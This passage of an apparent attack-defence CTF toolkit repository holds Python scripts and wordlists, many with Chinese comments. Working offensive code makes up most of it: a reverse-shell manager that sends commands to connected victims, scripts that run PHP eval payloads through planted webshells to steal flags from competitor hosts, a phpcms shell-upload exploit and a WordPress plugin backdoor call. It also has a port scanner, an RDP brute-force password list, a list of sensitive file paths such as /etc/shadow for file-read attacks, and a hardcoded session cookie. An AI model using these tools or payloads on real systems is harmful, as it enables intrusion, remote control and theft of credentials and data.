34 | class MyThreadingTCPServer(SocketServer.ThreadingTCPServer):
35 |
36 | def __init__(self, server_address, RequestHandlerClass):
37 | SocketServer.ThreadingTCPServer.__init__(
38 | self, server_address, RequestHandlerClass)
39 | self.request_queue_size = 200
40 | self.socket_type = socket.SOCK_STREAM
41 |
42 |
43 | if __name__ == '__main__':
44 | server = MyThreadingTCPServer(
45 | (HOST, PORT), ThreadedTCPRequestHandler)
46 | try:
47 | st = threading.Thread(target=server.serve_forever)
48 | st.daemon = True
49 | st.start()
50 | print "Server loop running in thread:", st.name
51 | cmd = raw_input("cmd > ")
52 | while cmd:
53 | if cmd == 'ls':
54 | print("ls\n")
55 | for i in range(1, len(CLIENTS) + 1):
56 | print("%d\t%s" % (i, CLIENTS[i - 1]))
57 | elif cmd[:4] == 'fuck':
58 | cid = int(cmd[4:])
59 | if not cid:
60 | print("fuck [num]")
61 | if CLIENTS[cid - 1]:
62 | print(CLIENTS[cid - 1])
63 | print("client %s >\n" % CLIENTS[cid - 1][1])
64 | client = CLIENTS[cid - 1][CLIENTS[cid - 1].keys()[0]]
65 | ccmd = raw_input("client > ")
66 | while ccmd:
67 | if ccmd == "vquit":
68 | break
69 | client.sendall(ccmd)
70 | ccmd = raw_input("client > ")
71 | elif cmd == 'exit':
72 | server.shutdown()
73 | server.server_close()
74 | break
75 | elif cmd[:4] == 'eval':
76 | eval(cmd[4:])
77 | else:
78 | print("Error cmd : %s" % cmd)
79 | cmd = raw_input("cmd > ")
80 | except KeyboardInterrupt:
81 | print("^C")
82 | server.shutdown()
83 | server.server_close()
84 | except Exception as e:
85 | print(e)
86 | # try:
87 | # cmd = raw_input("cmd > ")
88 | # while cmd:
89 | # if cmd == 'ls':
90 | # print("ls\n")
91 | # for i in CLIENTS:
92 | # print("\t%s" % i)
93 | # elif cmd == 'exit':
94 | # print("exit\n")
95 | # STOP = True
96 | # sys.exit(0)
97 | # else:
98 | # print("Error cmd : %s" % cmd)
99 | # cmd = raw_input("cmd > ")
100 | # except KeyboardInterrupt:
101 | # sys.exit(0)
102 |
--------------------------------------------------------------------------------
/awd/fuck_pc.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding:utf-8
3 | import requests
4 | import re
5 | import time
6 |
7 | req = None
8 |
9 | TOKEN = ""
10 | SUBMIT_URL = "http://192.168.80.1/lms/portal/sp/hz_flag.php"
11 | SUBMIT_U = ""
12 | SUBMIT_P = ""
13 |
14 | URLS = ['172.20.101.103',
15 | '172.20.102.103',
16 | '172.20.103.103',
17 | # '172.20.104.103',
18 | '172.20.105.103',
19 | '172.20.106.103',
20 | '172.20.107.103',
21 | '172.20.108.103'
22 | ]
23 |
24 | SHELLS = ["http://172.20.102.103/phpcms/uploadfile/2017/0520/20170520114246193.php",
25 | "http://172.20.102.103/phpcms/uploadfile/2017/0520/20170520114246193.php",
26 | "http://172.20.103.103/phpcms/uploadfile/2017/0520/20170520074437383.php",
27 | # "http://172.20.104.103/phpcms/uploadfile/2017/0520/20170520074438272.php",
28 | "http://172.20.105.103/phpcms/uploadfile/2017/0520/20170520114246624.php",
29 | "http://172.20.106.103/phpcms/uploadfile/2017/0520/20170520074438173.php",
30 | "http://172.20.107.103/phpcms/uploadfile/2017/0520/20170520114247898.php",
31 | "http://172.20.108.103/phpcms/uploadfile/2017/0520/20170520074438944.php"
32 | ]
33 |
34 |
35 | def poc_eval_backdoor_getflag_1(shellurl):
36 | data = {
37 | "virink": "echo file_get_contents('/flag.txt');"
38 | }
39 | res = requests.post(shellurl, data=data, timeout=5)
40 | if res.status_code == 200:
41 | print res.content
42 | return res.content
43 |
44 |
45 | def poc_phpcms_reg_shell(url):
46 | u = '{}/index.php?m=member&c=index&a=register&siteid=1'.format(url)
47 | data = {
48 | 'siteid': '1',
49 | 'modelid': '1',
50 | 'username': 'test',
51 | 'password': 'testxx',
52 | 'email': 'test@test.com',
53 | 'info[content]': '
',
54 | 'dosubmit': '1',
55 | }
56 | rep = requests.post(u, data=data)
57 | print(rep.content)
58 | shell = ''
59 | re_result = re.findall(r'<img src=(.*)>', rep.content)
60 | if len(re_result):
61 | shell = re_result[0]
62 | return shell
63 |
64 |
65 | def submit(flag, ip):
66 | headers = {
67 | "Cookie": "SSCSum=14; zlms-sid=uh8kbtd9jrki9ch4jo7qfnpnt0; webcs_test_cookie=lms_cookie_checker; lms_login_name=HZ9; PHPSESSID=jq11tlbp5kuvtk49h94r6b1ap2"
68 | }
69 | data = {
70 | "melee_flag": flag,
71 | "melee_ip": ip
72 | }
73 | res = requests.post(SUBMIT_URL, data=data, headers=headers, timeout=5)
74 | if res.status_code == 200:
75 | # print res.content
76 | html = res.content
77 | print html[-200:]
78 | if '您已提交过当前IP和FLAG' in html:
79 | print '您已提交过当前IP和FLAG'
80 | elif '恭喜您答对了' in html:
81 | print '恭喜您答对了'
82 |
83 | if __name__ == '__main__':
84 | # while True:
85 | for shell in SHELLS:
86 | print shell
87 | try:
88 | flag = poc_eval_backdoor_getflag_1(shell)
89 | if flag:
90 | print flag
91 | flag = flag.strip().replace('\r', '').replace('\n', '')
92 | print shell[7:21], flag
93 | submit(flag, shell[7:21])
94 | time.sleep(15)
95 | except Exception, e:
96 | print e
97 | pass
98 | print 'Waiting...'
99 | # time.sleep(60 * 10)
100 |
--------------------------------------------------------------------------------
/tools/portscan3.py:
--------------------------------------------------------------------------------
1 | #!/user/bin python
2 | # -*- coding:utf-8 -*-
3 | # Author:Bing
4 | # Contact:amazing_bing@outlook.com
5 | # DateTime: 2017-01-17 19:06:06
6 | # Description: coding
7 |
8 | import sys
9 | sys.path.append("..")
10 |
11 | import threading
12 | import socket
13 | import sys
14 | import cmd
15 | import os
16 | import Queue
17 | from core.settings import *
18 |
19 | # 线程锁
20 | lock = threading.Lock()
21 |
22 | # 制作扫描端口队列
23 |
24 |
25 | def GetQueue(host):
26 | PortQueue = Queue.Queue()
27 | for port in range(1, 65535):
28 | PortQueue.put((host, port))
29 | return PortQueue
30 |
31 |
32 | class ScanThread(threading.Thread):
33 |
34 | def __init__(self, SingleQueue, outip):
35 | threading.Thread.__init__(self)
36 | self.setDaemon(True) # 设置后台运行,让join结束
37 | self.SingleQueue = SingleQueue
38 | self.outip = outip
39 |
40 | def get_port_service(self, text):
41 | service_path = dict_script_path + "nmap-services.txt"
42 | port_server = str(text) + "/tcp"
43 | with open(service_path, "r") as server:
44 | for finger in server.readlines():
45 | port = finger.strip().split(";")[1]
46 | if port == port_server:
47 | fingers = str(finger.strip().split(";")[0])
48 | return (port_server, fingers)
49 | return (port_server, "unknown")
50 |
51 | def Ping(self, scanIP, Port):
52 | global OpenPort, lock
53 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
54 | sock.settimeout(0.1)
55 | address = (scanIP, Port)
56 | try:
57 | sock.connect(address)
58 | except:
59 | sock.close()
60 | return False
61 | sock.close()
62 | if lock.acquire():
63 | # print "IP:%s Port:%d" % (scanIP, Port)
64 | self.outip.put(self.get_port_service(Port))
65 | lock.release()
66 | return True
67 |
68 | def run(self):
69 | while not self.SingleQueue.empty():
70 | # 获取扫描队列,并扫描
71 | host, port = self.SingleQueue.get()
72 | self.Ping(host, port)
73 |
74 |
75 | class Work(object):
76 |
77 | def __init__(self, scan_id="", scan_target="", scan_type="", scan_args="", back_fn=None):
78 | self.scan_id = scan_id
79 | self.target = scan_target
80 | self.scan_type = scan_type
81 | self.args = scan_args
82 | self.back_fn = back_fn
83 | self.result = []
84 |
85 | def run(self):
86 | ThreadList = []
87 | # 扫描队列
88 | SingleQueue = GetQueue(self.target)
89 | # 存储结果队列
90 | resultQueue = Queue.Queue()
91 | # 启动200线程并发
92 | for i in range(0, 200):
93 | t = ScanThread(SingleQueue, resultQueue)
94 | ThreadList.append(t)
95 | for t in ThreadList:
96 | t.start()
97 | for t in ThreadList:
98 | # 需要设置线程为后台,然后没法结束;join等待结束后台线程
99 | t.join(0.1)
100 |
101 | data = []
102 | while not resultQueue.empty():
103 | line = resultQueue.get()
104 | data.append(
105 | {"bug_name": str(line[0]), "bug_summary": str(line[1])})
106 | result = {"status": 1, "data": data,
107 | "scan_id": self.scan_id, "scan_type": "nmap"}
108 | self.back_fn(result)
109 |
110 |
111 | def save(nmap_result):
112 | print nmap_result, "----------------"
113 |
114 | if __name__ == '__main__':
115 | t = Work(scan_target="100tal.org", back_fn=save)
116 | t.run()
117 |
--------------------------------------------------------------------------------
/awd/shellmanager.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 |
4 | import socket
5 | import sys
6 | import threading
7 | import time
8 | import random
9 |
10 | HOST = '0.0.0.0'
11 | PORT = 23333
12 | BUFSIZE = 1024 * 8
13 |
14 | VER = sys.version_info.major
15 |
16 | if VER == 3:
17 | raw_input = input
18 |
19 |
20 | class Reader(threading.Thread):
21 |
22 | def __init__(self, client):
23 | threading.Thread.__init__(self)
24 | self.client = client
25 | self.stop = False
26 |
27 | def run(self):
28 | while not self.stop:
29 | data = self.client.recv(BUFSIZE)
30 | if data:
31 | print(data)
32 | time.sleep(1)
33 | continue
34 |
35 | def cmd(self, cmd):
36 | self.client.sendall(cmd)
37 |
38 | def stop(self):
39 | self.stop = True
40 |
41 | x = {
42 | "127.0.0.1": {
43 | "port": "c"
44 | }
45 | }
46 |
47 |
48 | class Listener(threading.Thread):
49 |
50 | def __init__(self, port):
51 | threading.Thread.__init__(self)
52 | self.clients = {}
53 | self.stop = False
54 | self.port = port
55 | self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
56 | self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
57 | self.sock.bind((HOST, port))
58 | self.sock.listen(1)
59 |
60 | def run(self):
61 | print("listener started %s\n" % self.port)
62 | while not self.stop:
63 | client, cltadd = self.sock.accept()
64 | t = Reader(client)
65 | c_host = str(client.getpeername()[0])
66 | c_port = client.getpeername()[1]
67 | if c_host not in self.clients:
68 | self.clients.update({c_host: {c_port: t}})
69 | else:
70 | self.clients[c_host].update({c_port: t})
71 | t.start()
72 |
73 | def stop(self):
74 | for i in self.clients:
75 | self.clients[i][1].stop()
76 | self.stop = True
77 |
78 |
79 | def cmd(lst):
80 | cmd = raw_input("cmd > ")
81 | while True:
82 | try:
83 | if cmd == 'ls':
84 | for k_host in lst.clients:
85 | print(">> %s\n" % (k_host))
86 | for k_port in lst.clients[k_host]:
87 | print(">>>> %s -> %s\n" %
88 | (k_port, lst.clients[k_host][k_port]))
89 | elif cmd[:4] == 'fuck':
90 | cc = cmd[5:].strip()
91 | cc = cc.split(":")
92 | host = cc[0]
93 | port = cc[1]
94 | if host and lst.clients[host]:
95 | client = lst.clients[host][port]
96 | pt = "client %s:%d >>" % (host, port)
97 | ccmd = raw_input(pt)
98 | while ccmd:
99 | if ccmd == "vquit" or ccmd == "vq":
100 | break
101 | client.sendall(ccmd + "\n")
102 | ccmd = ""
103 | ccmd = raw_input(pt)
104 | elif cmd == 'exit':
105 | lst.stop()
106 | break
107 | elif cmd[:4] == 'eval':
108 | eval(cmd[4:])
109 | else:
110 | print("cmd :\n\tls\n\tfuck [n]\n\texit")
111 | # TODO test-live
112 | cmd = raw_input("cmd > ")
113 | except Exception as e:
114 | print(e)
115 |
116 | if __name__ == '__main__':
117 | lst = Listener(PORT)
118 | lst.daemon = True
119 | lst.start()
120 | cmd(lst)
121 |
--------------------------------------------------------------------------------
/dict/password/3389爆破字典.txt:
--------------------------------------------------------------------------------
1 | 123456.com
2 | 123123
3 | idc123!@#
4 | 123
5 | aaa123!@#
6 | qq123.com
7 | 123456
8 | wantian##*(
9 | qwe123
10 | qwe1234
11 | 123qwe
12 | 123qwer
13 | 1qaz2wsx
14 | 1qaz
15 | 159753
16 | !Q@W#E
17 | 159357
18 | 147369
19 | 1234567
20 | password
21 | aistar123<>!N
22 | 321
23 | idcji2010
24 | qqqqqq
25 | 1q2w3e
26 | q1w2e3
27 | 336699
28 | abc123
29 | asd123
30 | 123654
31 | 1
32 | 111111
33 | 111
34 | 111qqq...
35 | 123456
36 | 953139.
37 | 0258
38 | 111qqq!!!
39 | 1236
40 | qqii
41 | tyinfo
42 | abcd36888
43 | rst_login
44 | OAOidc
45 | OAOidc123!@#
46 | OAOidc123
47 | esin888
48 | qwer
49 | power123
50 | power.liu
51 | power.yu
52 | dns99+588
53 | zhengui
54 | idc0.1
55 | 7715123
56 | sdwer
57 | power.zhao
58 | sdwer123
59 | qwer1234
60 | esincs
61 | jspower123.0
62 | 5656789
63 | 2323456
64 | power.com
65 | power123.0
66 | power0.123
67 | jspower.com
68 | 123123
69 | hlwj0519-1205.jf
70 | 123321
71 | zaxscdvf
72 | ..0
73 | !@#$QWER
74 | 95313
75 | 1231321
76 | 321123
77 | vipnew
78 | idc0514
79 | 1235698
80 | 235689
81 | 326598
82 | 112233
83 | 111222
84 | qqqqqq
85 | idc11
86 | 21vianet
87 | #@!ewq
88 | 1010
89 | 111qqq
90 | 1234%^&*
91 | 12345^&*()
92 | 123456
93 | 4867086
94 | 1234567
95 | 123!@#
96 | 123456!@#
97 | 10000
98 | 794613
99 | 784512
100 | 895623
101 | 789456
102 | 456123
103 | 654321
104 | 123!@#
105 | 1234!@#$
106 | 11185
107 | 12345!@#$%
108 | qwe123!@#
109 | !@#123
110 | !@#321
111 | 123#@!
112 | 19861212
113 | 19831212
114 | 19841020
115 | #@!123
116 | #@!321
117 | idcidc
118 | 12345^&*()
119 | !@#$%^&*()
120 | )(*&^%$#@!
121 | 0987654321
122 | tyidc
123 | 1122
124 | 111222
125 | idc123
126 | idcidcok
127 | idcuser
128 | abcd1234
129 | 1234abcd
130 | caonima
131 | 1q2w3e4r
132 | 888888
133 | admin!@#
134 | abc!@#
135 | !Q@W#E$R%T
136 | idc2010
137 | 1236
138 | 1q2w3e4r5t
139 | qqaazz
140 | asdasd
141 | admin
142 | admin1
143 | admin123
144 | aaa111
145 | 111aaa
146 | 123aaa
147 | lh222
148 | lhidc
149 | 123a
150 | a123
151 | 123456a
152 | a123456
153 | aaa123
154 | qazwsx
155 | qazxsw
156 | 0123
157 | 123112233
158 | 123111
159 | www.7x24.cn
160 | shisp.net
161 | 123000
162 | idc0123
163 | 1230..
164 | 123456789
165 | 123456qwe
166 | 123qwe
167 | 12345qwert
168 | zxcvbnm
169 | qwerty
170 | qweqwe
171 | q1w2e3
172 | 123ewq
173 | qwe321
174 | 1qazxsw2
175 | 12qwaszx
176 | 1234rewq
177 | 123456.com
178 | lituobestsanmao
179 | !@#19841010
180 | 19885510
181 | xyidc_2006
182 | 95217189
183 | 95217
184 | chinayixun
185 | huachen1258zz
186 | sanhe123
187 | 3H8IDC!!#
188 | 3H8IDC72sanhe000
189 | xiaoyili
190 | sanhe000~!@#
191 | 3H8IDC!!#
192 | ccfeng66131421
193 | !@#59560955
194 | tkggja850518`1
195 | zhengui
196 | anada325!@#
197 | www.txwscx.comsritgyxf2sxy19831122zx
198 | ZHONGGUO$#@!999@
199 | admin13906271234
200 | 395835961
201 | senlinyan
202 | 3203672
203 | 9527999!!!
204 | P@ssw0rd
205 | huaiyukeji115
206 | idc9aewr42
207 | idc0.1
208 | 123asdasd
209 | qsx6059410172.
210 | idc0001
211 | idc800888
212 | idc46121
213 | 123asdasd
214 | 882627.8
215 | luofei520!@#123
216 | 852799!!!
217 | idc0123.0
218 | 513tyml.com
219 | abc123!@#
220 | 1q2w3e,./? ><
221 | 6504710shuazuan
222 | 123.789+
223 | 123asdasd
224 | 752883855.
225 | senlinyan$
226 | admin001
227 | 6695zx
228 | scictd9821622
229 | 365obsserver!
230 | ranglm123456
231 | 13920225257
232 | idc925111
233 | 1qaz@wsx#edc
234 | .......199
235 | xu15817079919
236 | yanjin0429
237 | zhangznw
238 | 13527380230
239 | idc0.01
240 | idc123&123
241 | 662766
242 | 122.224
243 | huaiyukeji115
244 | .......199@
245 | liuzhangzi1988
246 | 123456!@#$%^
247 | idc0123
248 | dahouzi110
249 | 123.789+
250 | trista188#**
251 | mm1237
252 | 07736056123
253 | TnHoo15862380404
254 | idc0123
255 | 189532210113
256 | idc123
257 | gedingfeng1102888
--------------------------------------------------------------------------------
/awd/fuck_wp_1.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding:utf-8
3 | import requests
4 | import re
5 | import time
6 |
7 | req = None
8 |
9 | TOKEN = ""
10 | SUBMIT_URL = "http://192.168.80.1/lms/portal/sp/hz_flag.php"
11 | SUBMIT_U = ""
12 | SUBMIT_P = ""
13 |
14 | URLS = ['172.20.101.101',
15 | '172.20.102.101',
16 | '172.20.103.101',
17 | # '172.20.104.101',
18 | '172.20.105.101',
19 | '172.20.106.101',
20 | '172.20.107.101',
21 | '172.20.108.101'
22 | ]
23 | URLS2 = ['172.20.101.103',
24 | '172.20.102.103',
25 | '172.20.103.103',
26 | # '172.20.104.103',
27 | '172.20.105.103',
28 | '172.20.106.103',
29 | '172.20.107.103',
30 | '172.20.108.103'
31 | ]
32 |
33 |
34 | def poc_eval_backdoor_getflag_1(shellurl, p, code):
35 | data = {
36 | p: code
37 | }
38 | try:
39 | res = requests.post(shellurl, data=data, timeout=5)
40 | if res.status_code == 200:
41 | return res.content
42 | except Exception, e:
43 | print e
44 |
45 |
46 | def poc_phpcms_reg_shell(url):
47 | u = 'http://{}/phpcms/index.php?m=member&c=index&a=register&siteid=1'.format(
48 | url)
49 | data = {
50 | 'siteid': '1',
51 | 'modelid': '1',
52 | 'username': 'test',
53 | 'password': 'testxx',
54 | 'email': 'test@test.com',
55 | 'info[content]': '
',
56 | 'dosubmit': '1',
57 | }
58 | rep = requests.post(u, data=data)
59 | print(rep.content)
60 | shell = ''
61 | re_result = re.findall(r'<img src=(.*)>', rep.content)
62 | if len(re_result):
63 | shell = re_result[0]
64 | print url, shell
65 | return shell
66 |
67 |
68 | def submit(flag, ip):
69 | headers = {
70 | "Cookie": "SSCSum=14; zlms-sid=uh8kbtd9jrki9ch4jo7qfnpnt0; webcs_test_cookie=lms_cookie_checker; lms_login_name=HZ9; PHPSESSID=jq11tlbp5kuvtk49h94r6b1ap2"
71 | }
72 | data = {
73 | "melee_flag": flag,
74 | "melee_ip": ip
75 | }
76 | res = requests.post(SUBMIT_URL, data=data, headers=headers, timeout=5)
77 | if res.status_code == 200:
78 | # print res.content
79 | html = res.content
80 | print html[-200:]
81 | if '您已提交过当前IP和FLAG' in html:
82 | print '您已提交过当前IP和FLAG'
83 | elif '恭喜您答对了' in html:
84 | print '恭喜您答对了'
85 |
86 |
87 | def fuck_1():
88 | req = requests.session()
89 | for ip in URLS:
90 | try:
91 | su = 'http://{}/wp-content/plugins/mailpress/uninstall.php'.format(
92 | ip)
93 | flag = poc_eval_backdoor_getflag_1(
94 | su, "525", "echo file_get_contents('/flag.txt');")
95 | if flag:
96 | flag = flag.strip().replace('\r', '').replace('\n', '')
97 | print ip, flag
98 | submit(flag, ip)
99 | time.sleep(15)
100 | except Exception, e:
101 | print e
102 |
103 |
104 | def test():
105 | for ip in URLS:
106 | # su = 'http://{}/wp-content/plugins/mailpress/uninstall.php'.format(
107 | # ip)
108 | custom_shell_add_shell(ip)
109 | # flag = poc_eval_backdoor_getflag_1(
110 | # su, "525", "echo file_get_contents('/flag.txt');")
111 | print ip
112 |
113 |
114 | if __name__ == '__main__':
115 | fuck_1()
116 | # while True:
117 | # fuck_1()
118 | # print 'Waiting...'
119 | # time.sleep(60 * 20)
120 | # poc_phpcms_reg_shell('172.20.102.103')
121 | # for ip in URLS2:
122 | # poc_phpcms_reg_shell(ip)
123 |
--------------------------------------------------------------------------------
/scripts/rtcp.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | '''
4 | filename:rtcp.py
5 | @desc:
6 | 利用python的socket端口转发,用于远程维护
7 | 如果连接不到远程,会sleep 36s,最多尝试200(即两小时)
8 |
9 | @usage:
10 | ./rtcp.py stream1 stream2
11 | stream为:l:port或c:host:port
12 | l:port表示监听指定的本地端口
13 | c:host:port表示监听远程指定的端口
14 |
15 | @author: watercloud, zd, knownsec team
16 | @web: www.knownsec.com, blog.knownsec.com
17 | @date: 2009-7
18 | '''
19 |
20 | import socket
21 | import sys
22 | import threading
23 | import time
24 |
25 | streams = [None, None] # 存放需要进行数据转发的两个数据流(都是SocketObj对象)
26 | debug = 1 # 调试状态 0 or 1
27 |
28 | def _usage():
29 | print 'Usage: ./rtcp.py stream1 stream2\nstream : l:port or c:host:port'
30 |
31 | def _get_another_stream(num):
32 | '''
33 | 从streams获取另外一个流对象,如果当前为空,则等待
34 | '''
35 | if num == 0:
36 | num = 1
37 | elif num == 1:
38 | num = 0
39 | else:
40 | raise "ERROR"
41 |
42 | while True:
43 | if streams[num] == 'quit':
44 | print("can't connect to the target, quit now!")
45 | sys.exit(1)
46 |
47 | if streams[num] != None:
48 | return streams[num]
49 | else:
50 | time.sleep(1)
51 |
52 | def _xstream(num, s1, s2):
53 | '''
54 | 交换两个流的数据
55 | num为当前流编号,主要用于调试目的,区分两个回路状态用。
56 | '''
57 | try:
58 | while True:
59 | #注意,recv函数会阻塞,直到对端完全关闭(close后还需要一定时间才能关闭,最快关闭方法是shutdow)
60 | buff = s1.recv(1024)
61 | if debug > 0:
62 | print num,"recv"
63 | if len(buff) == 0: #对端关闭连接,读不到数据
64 | print num,"one closed"
65 | break
66 | s2.sendall(buff)
67 | if debug > 0:
68 | print num,"sendall"
69 | except :
70 | print num,"one connect closed."
71 |
72 | try:
73 | s1.shutdown(socket.SHUT_RDWR)
74 | s1.close()
75 | except:
76 | pass
77 |
78 | try:
79 | s2.shutdown(socket.SHUT_RDWR)
80 | s2.close()
81 | except:
82 | pass
83 |
84 | streams[0] = None
85 | streams[1] = None
86 | print num, "CLOSED"
87 |
88 | def _server(port, num):
89 | '''
90 | 处理服务情况,num为流编号(第0号还是第1号)
91 | '''
92 | srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
93 | srv.bind(('0.0.0.0', port))
94 | srv.listen(1)
95 | while True:
96 | conn, addr = srv.accept()
97 | print "connected from:", addr
98 | streams[num] = conn # 放入本端流对象
99 | s2 = _get_another_stream(num) # 获取另一端流对象
100 | _xstream(num, conn, s2)
101 |
102 | def _connect(host, port, num):
103 | ''' 处理连接,num为流编号(第0号还是第1号)
104 |
105 | @note: 如果连接不到远程,会sleep 36s,最多尝试200(即两小时)
106 | '''
107 | not_connet_time = 0
108 | wait_time = 36
109 | try_cnt = 199
110 | while True:
111 | if not_connet_time > try_cnt:
112 | streams[num] = 'quit'
113 | print('not connected')
114 | return None
115 |
116 | conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
117 | try:
118 | conn.connect((host, port))
119 | except Exception, e:
120 | print ('can not connect %s:%s!' % (host, port))
121 | not_connet_time += 1
122 | time.sleep(wait_time)
123 | continue
124 |
125 | print "connected to %s:%i" % (host, port)
126 | streams[num] = conn #放入本端流对象
127 | s2 = _get_another_stream(num) #获取另一端流对象
128 | _xstream(num, conn, s2)
129 |
130 |
131 | if __name__ == '__main__':
132 | if len(sys.argv) != 3:
133 | _usage()
134 | sys.exit(1)
135 | tlist = [] # 线程列表,最终存放两个线程对象
136 | targv = [sys.argv[1], sys.argv[2] ]
137 | for i in [0, 1]:
138 | s = targv[i] # stream描述 c:ip:port 或 l:port
139 | sl = s.split(':')
140 | if len(sl) == 2 and (sl[0] == 'l' or sl[0] == 'L'): # l:port
141 | t = threading.Thread(target=_server, args=(int(sl[1]), i))
142 | tlist.append(t)
143 | elif len(sl) == 3 and (sl[0] == 'c' or sl[0] == 'C'): # c:host:port
144 | t = threading.Thread(target=_connect, args=(sl[1], int(sl[2]), i))
145 | tlist.append(t)
146 | else:
147 | _usage()
148 | sys.exit(1)
149 |
150 | for t in tlist:
151 | t.start()
152 | for t in tlist:
153 | t.join()
154 | sys.exit(0)
155 |
--------------------------------------------------------------------------------
/dict/ssrf/config.dic:
--------------------------------------------------------------------------------
1 | /NetServer/bin/stable/apache/php.ini
2 | /PHP/php.ini
3 | /Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
4 | /Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
5 | /Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
6 | /Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
7 | /Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
8 | /Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
9 | /Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
10 | /Volumes/webBackup/opt/apache2/conf/httpd.conf
11 | /Volumes/webBackup/private/etc/httpd/httpd.conf
12 | /Volumes/webBackup/private/etc/httpd/httpd.conf.default
13 | /apache/php/php.ini
14 | /bin/php.ini
15 | /etc/apache/conf/httpd.conf
16 | /etc/apache2/apache2.conf
17 | /etc/apache2/conf/httpd.conf
18 | /etc/apache2/httpd.conf
19 | /etc/chrootUsers
20 | /etc/ftpchroot
21 | /etc/ftphosts/etc/motd
22 | /etc/group
23 | /etc/http/conf/httpd.conf
24 | /etc/http/httpd.conf
25 | /etc/httpd.conf
26 | /etc/httpd/conf/httpd.conf
27 | /etc/httpd/httpd.conf
28 | /etc/httpd/php.ini
29 | /etc/issue
30 | /etc/logrotate.d/ftp
31 | /etc/logrotate.d/proftpd
32 | /etc/my.cnf
33 | /etc/mysql/my.cnf
34 | /etc/passwd
35 | /etc/php.ini
36 | /etc/php/apache/php.ini
37 | /etc/php/apache2/php.ini
38 | /etc/php/cgi/php.ini
39 | /etc/php/php.ini
40 | /etc/php/php4/php.ini
41 | /etc/php4.4/fcgi/php.ini
42 | /etc/php4/apache/php.ini
43 | /etc/php4/apache2/php.ini
44 | /etc/php4/cgi/php.ini
45 | /etc/php5/apache/php.ini
46 | /etc/php5/apache2/php.ini
47 | /etc/php5/cgi/php.ini
48 | /etc/proftp.conf
49 | /etc/proftpd/modules.conf
50 | /etc/protpd/proftpd.conf
51 | /etc/pure-ftpd.conf
52 | /etc/pure-ftpd/pure-ftpd.conf
53 | /etc/pure-ftpd/pure-ftpd.pdb
54 | /etc/pure-ftpd/pureftpd.pdb
55 | /etc/pureftpd.passwd
56 | /etc/pureftpd.pdb
57 | /etc/security/environ
58 | /etc/security/group
59 | /etc/security/limits
60 | /etc/security/passwd
61 | /etc/security/user
62 | /etc/shadow
63 | /etc/vhcs2/proftpd/proftpd.conf
64 | /etc/vsftpd.chroot_list
65 | /etc/vsftpd.conf
66 | /etc/vsftpd/vsftpd.conf
67 | /etc/wu-ftpd/ftphosts
68 | /etc/wu-ftpd/ftpusers
69 | /home/bin/stable/apache/php.ini
70 | /home2/bin/stable/apache/php.ini
71 | /opt/apache/conf/httpd.conf
72 | /opt/apache2/conf/httpd.conf
73 | /opt/xampp/etc/php.ini
74 | /php/php.ini
75 | /php4/php.ini
76 | /php5/php.ini
77 | /private/etc/httpd/httpd.conf
78 | /private/etc/httpd/httpd.conf.default
79 | /usr/apache/conf/httpd.conf
80 | /usr/apache2/conf/httpd.conf
81 | /usr/etc/pure-ftpd.conf
82 | /usr/lib/php.ini
83 | /usr/lib/php/php.ini
84 | /usr/lib/security/mkuser.default
85 | /usr/local/Zend/etc/php.ini
86 | /usr/local/apache/conf/httpd.conf
87 | /usr/local/apache/conf/php.ini
88 | /usr/local/apache/httpd.conf
89 | /usr/local/apache2/conf/httpd.conf
90 | /usr/local/apache2/httpd.conf
91 | /usr/local/apps/apache/conf/httpd.conf
92 | /usr/local/apps/apache2/conf/httpd.conf
93 | /usr/local/etc/apache/conf/httpd.conf
94 | /usr/local/etc/apache/vhosts.conf
95 | /usr/local/etc/apache2/conf/httpd.conf
96 | /usr/local/etc/httpd/conf/httpd.conf
97 | /usr/local/etc/php.ini
98 | /usr/local/etc/pure-ftpd.conf
99 | /usr/local/etc/pureftpd.pdb
100 | /usr/local/httpd/conf/httpd.conf
101 | /usr/local/lib/php.ini
102 | /usr/local/php/httpd.conf
103 | /usr/local/php/httpd.conf.php
104 | /usr/local/php/lib/php.ini
105 | /usr/local/php4/httpd.conf
106 | /usr/local/php4/httpd.conf.php
107 | /usr/local/php4/lib/php.ini
108 | /usr/local/php5/httpd.conf
109 | /usr/local/php5/httpd.conf.php
110 | /usr/local/php5/lib/php.ini
111 | /usr/local/pureftpd/etc/pure-ftpd.conf
112 | /usr/local/pureftpd/etc/pureftpd.pdb
113 | /usr/local/pureftpd/sbin/pure-config.pl
114 | /usr/pkgsrc/net/pureftpd/
115 | /usr/ports/contrib/pure-ftpd/
116 | /usr/ports/net/pure-ftpd/
117 | /usr/sbin/pure-config.pl
118 | /var/lib/mysql/my.cnf
119 | /var/local/www/conf/php.ini
120 | /var/www/conf/httpd.conf
121 | /web/conf/php.ini
122 | /xampp/apache/bin/php.ini
123 |
--------------------------------------------------------------------------------
/tools/vi_vim_scan_and_download.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | # __Author__: Byblue
3 | # __Change__: Virink
4 |
5 | import time
6 | import urllib
7 | import urllib2
8 |
9 |
10 | interval = 1
11 |
12 | websites = {
13 | "http://web.l-ctf.com:55533": "php"
14 | }
15 | script = {
16 | "general": {
17 | "/robots.txt", "/install.txt", "/password.txt", "/readme.txt", "/sql.txt", "/Password.txt", "/ReadMe.txt",
18 | "/www.rar", "/wwwroot.rar", "/webroot.rar", "/backup.rar",
19 | "/www.zip", "/wwwroot.zip", "/webroot.zip", "/backup.zip",
20 | "/DS_Store", "/.DS_Store", "/.svn/entries", "/.htaccess", "/.git/config"
21 | },
22 | "php": {
23 | "index.php",
24 | "config.php"
25 | },
26 | "jsp": {
27 | "index.jsp",
28 | "config.jsp"
